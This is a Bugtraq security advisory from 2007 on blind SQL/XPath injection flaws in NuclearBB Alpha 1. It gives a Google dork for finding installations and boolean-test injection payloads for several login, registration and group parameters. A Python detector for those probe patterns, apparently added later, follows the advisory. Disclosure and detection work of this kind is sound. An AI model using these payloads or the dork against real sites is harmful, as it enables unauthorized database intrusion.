Bugtraq mailing list archives
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
From: john () martinelli com
Date: 18 Apr 2007 19:16:26 -0000
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"

=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz password=passxyz submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyz () xyz com email=xyz () xyz com pass1=passwordxyz pass2=passwordxyz website=xyz () xyz com"+and+"1"="0 location=xyz () xyz com msn=xyz () xyz com yahoo=xyz () xyz com aol=xyz () xyz com icq=xyz () xyz com signature=xyz () xyz com coppa_state=over register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyz () xyz com email=xyz () xyz com pass1=xyz () xyz com pass2=xyz () xyz com website=xyz () xyz com location=xyz () xyz com msn=xyz () xyz com yahoo=xyz () xyz com aol=xyz () xyz com"+and+"1"="0 icq=xyz () xyz com signature=xyz () xyz com coppa_state=over register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyz () xyz com email=xyz () xyz com pass1=xyz () xyz com pass2=xyz () xyz com website=xyz () xyz com location=xyz () xyz com msn=xyz () xyz com yahoo=xyz () xyz com aol=xyz () xyz com icq=xyz () xyz com signature=xyz () xyz com"+and+"1"="0 coppa_state=over register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

username=xyz () xyz com email=xyz () xyz com+and+1=0 pass1=xyz () xyz com pass2=xyz () xyz com website=xyz () xyz com location=xyz () xyz com msn=xyz () xyz com yahoo=xyz () xyz com aol=xyz () xyz com icq=xyz () xyz com signature=xyz () xyz com coppa_state=over&register_submit=Register

John Martinelli
john () martinelli com
http://john-martinelli.com

April 18th, 2007
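A detection-side check for the probe shapes listed in the advisory above, added here as an example; it is not part of the original post or of NuclearBB. The function name `find_probes`, the (URL, form body) input shape and the deliberately narrow regex are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script/parameter pairs named in the advisory.
ADVISORY_PARAMS = {
    "login.php": {"submit"},
    "register.php": {"website", "aol", "signature", "email"},
    "groups.php": {"g"},
}

# An AND/OR clause comparing two numeric literals, optionally quoted.
# Matches the decoded forms  x" and "1"="0  and  1 and 1=0  from the advisory.
# Narrow on purpose (assumption): ordinary text such as "Tom and Jerry" passes.
BOOLEAN_TAIL = re.compile(
    r"""\b(?:and|or)\s+["']?\d+["']?\s*=\s*["']?\d+""", re.IGNORECASE
)

def find_probes(url, body=""):
    """Return [(script, param, decoded_value, named_in_advisory)] for each
    query-string or form parameter whose value ends in a boolean test."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    hits = []
    for source in (parts.query, body):
        # parse_qsl splits on the first '=' only and URL-decodes, so the
        # '=' inside the injected comparison stays in the value.
        for name, value in parse_qsl(source, keep_blank_values=True):
            if BOOLEAN_TAIL.search(value):
                named = name in ADVISORY_PARAMS.get(script, set())
                hits.append((script, name, value, named))
    return hits

# Constructed sample requests: (URL, form body).
SAMPLE = [
    ("http://www.example.com/groups.php?g=1+and+1=0", ""),
    ("http://www.example.com/login.php",
     'username=xyz&password=passxyz&submit=Login"+and+"1"="0'),
    ("http://www.example.com/register.php",
     "username=xyz&signature=Tom+and+Jerry&coppa_state=over"),
    ("http://www.example.com/groups.php?g=1", ""),
]

if __name__ == "__main__":
    for url, body in SAMPLE:
        for script, param, value, named in find_probes(url, body):
            tag = "advisory parameter" if named else "other parameter"
            print(f"{script} {param}={value!r} ({tag})")
```

A hit on an advisory parameter is a signal to review, not proof of compromise; the fix remains binding these inputs as query parameters instead of concatenating them.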